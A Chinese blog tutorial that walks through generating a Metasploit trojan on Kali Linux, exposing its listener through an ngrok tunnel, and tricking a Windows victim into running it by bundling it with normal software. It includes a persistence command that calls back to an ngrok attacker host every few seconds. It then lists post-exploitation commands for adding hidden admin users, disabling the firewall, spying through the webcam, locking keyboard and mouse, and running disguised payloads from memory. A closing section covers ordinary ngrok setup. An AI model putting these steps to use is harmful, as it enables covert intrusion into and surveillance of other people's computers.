Kali Linux 木马 内网穿透 保姆级教学

前言:在我的文章最早第一篇就发布了,但是当时用的是国内的飞鸽内网穿透,现在不仅仅要实名认证,而且免费的也没有了,部署和修改也比较麻烦。在这里我再推荐一个更好用的内网穿透,上手简单,而且完全免费也相对比较稳定可靠,就是大名鼎鼎的 Ngrok

https://dashboard.ngrok.com/icon-default.png?t=N7T8https://dashboard.ngrok.com/

 任务一  注册账号,(QQ邮箱不行!,我的GitHub账号由qq邮箱注册都无法授权)

任务二  如果遇到了一点问题请科学上网 咳咳嗯力挺非常good 魔戒.net 

任务三 这里选择Linux的,再去下载

任务四 下载完以后,将压缩包放到kali里面,解压。会得到ngrok文件

tar -xvzf ngrok-v3-stable-linux-amd64.tgz 

任务五 配置文件 回到APT,会发现下面有 密钥,复制

任务六 配置 ,在kali里面输入进去,在执行的时候记得加上 "./",出现了下面这个就是成功了.

任务七  连接服务器,进行内网穿透,本地监听端口

任务八 生成msf木马(未免杀) ,注意自己端口和地址

任务九 利用msf,使用以下模块 ,我这里监听端口是2024,是因为我左上角设置2024!!!

任务十 在Windows运行(在现实中,你要诱导受害者点击,比如捆绑正常软件.....等)

任务十一  添加持久性木马(后渗透),当你再次使用模块监听时,会自动连接

run persistence -X -i 3 -r [公网服务器名称 0.tcp.jp.ngrok.io] -p [公网端口]
-X                 //开机自启动
-i                 //回连的时间间隔 (-i 3 代表每3秒钟连接我们一次)
-r                 //目标机器 IP 地址(攻击主机)
-p                 //监听反向连接端口号

 

任务十二 kali后渗透命令 

 

基础命令
shell         #进入目标机cmd shell
background    #将当前会话放置后台
sessions      #sessions -h 查看帮助
sessions -i <ID值>  #进入会话   -k  杀死会话
bgrun / run   #执行已有的模块,输入run后按两下tab,列出已有的脚本
info      #查看已有模块信息
getuid    #查看当前用户身份
getprivs  #查看当前用户具备的权限
getpid    #获取当前进程ID(PID)
sysinfo   #查看目标机系统信息
irb   #开启ruby终端
ps    #查看正在运行的进程    
kill <PID值> #杀死指定PID进程
idletime     #查看目标机闲置时间
reboot / shutdown    #重启/关机
 
cmd命令
whoami     #当前权限
quser      #当前在线的管理员
net user   #存在用户
net user 用户名 密码 /add            #添加用户和对应密码
net localgroup 用户组名 用户名 /add  #将指定用户添加到指定用户组
netstat -ano  #查询当前计算机中网络连接通信情况,LISTENING表示该端口处于监听状态;ESTABLISHED表示该端口处于工作(通信)状态
systeminfo     #查看当前计算机中的详细情况
tasklist /svc  #查看每个进程所对应的服务
taskkill /f /im 程序名称    #结束某个指定名称的程序
taskkill /f /PID ID        #结束某个指定PID的进程
tasklist | findstr "字符串" #查找输出结果中指定的内容
netsh adcfirewall set allprofiles state off  #关闭防火墙
logoff        #注销某个指定用户的ID
shutdown -r   #重启当前计算机

 

​​​​​​​webcam摄像头命令
webcam_list     #查看摄像头
webcam_snap     #通过摄像头拍照
webcam_stream   #通过摄像头开启视频
uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
uictl disable mouse     #禁用鼠标
uictl disable keyboard  #禁用键盘
execute执行文件
execute   #在目标机中执行文件
execute -H -i -f  cmd.exe   #创建新进程cmd.exe,-H不可见,-i交互
execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt"
  #-d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行
  #"-o hack.txt"是payload.exe的运行参数

 这几段是从别的文章复制过来的,有兴趣就去看

【kali-漏洞利用】(3.3)后渗透之Meterpreter(上):命令大全_kali的meterpreter查看摄像头命令-优快云博客

 任务十三 收工

 

 

### Kali Linux 上设置 Ngrok 进行内网穿透 #### 安装 Ngrok 客户端 为了在 Kali Linux 中使用 Ngrok 实现内网穿透,需先下载并安装 Ngrok 的客户端。访问官方网站 https://ngrok.com/ 或者国内镜像站点获取最新版的 Ngrok 下载链接[^2]。 #### 注册账户与认证 前往 Ngrok 官方网站注册账号,推荐通过 GitHub 账号直接登录以规避可能遇到的验证码问题。完成注册后,在个人页面找到 Authtoken 并保存下来;此令牌用于激活本地计算机上的 Ngrok 服务。 ```bash ./ngrok authtoken your_auth_token_here ``` 上述命令中的 `your_auth_token_here` 需替换为实际获得的授权码字符串。 #### 启动隧道服务 成功绑定账号后即可创建新的隧道连接。假设要暴露本地运行的一个 HTTP Web 应用程序,则可执行如下指令: ```bash ./ngrok http 80 ``` 这条语句表示将本机第 80 号端口映射至互联网上随机分配的一个公共 URL 地址下[^4]。 对于更复杂的场景如远程桌面共享或是其他 TCP 协议支持的服务,也可以指定不同的参数来满足需求。例如建立 SSH 访问通道: ```bash ./ngrok tcp 22 ``` 这会把本地 SSH 服务开放出去供外部网络接入。 #### 设置持久化连接 (可选) 如果希望构建更加稳定可靠的长期在线环境,考虑利用 Crontab 或 Systemd 等机制确保 Ngrok 进程始终处于活动状态。另外还可以借助特定脚本来定期重启或监控其工作状况[^3]。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

淡水猫.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值